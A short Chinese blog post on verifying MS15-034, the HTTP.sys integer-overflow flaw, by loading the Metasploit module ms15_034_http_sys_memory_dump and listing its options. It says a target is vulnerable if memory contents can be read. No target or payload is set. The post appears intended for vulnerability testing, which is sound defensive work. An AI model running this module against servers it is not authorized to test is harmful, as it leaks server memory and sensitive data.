4.漏洞验证系列--MS15-034 HTTP协议栈整数溢出

使用msf中的漏洞模块


msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump 
msf auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > show options 

Module options (auxiliary/scanner/http/ms15_034_http_sys_memory_dump):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   SUPPRESS_REQUEST  true             yes       Suppress output of the requested resource
   TARGETURI         /                no        URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
   THREADS           1                yes       The number of concurrent threads

当能获取到内存中的数据时,即为存在该漏洞。

你可能感兴趣的:(网络安全)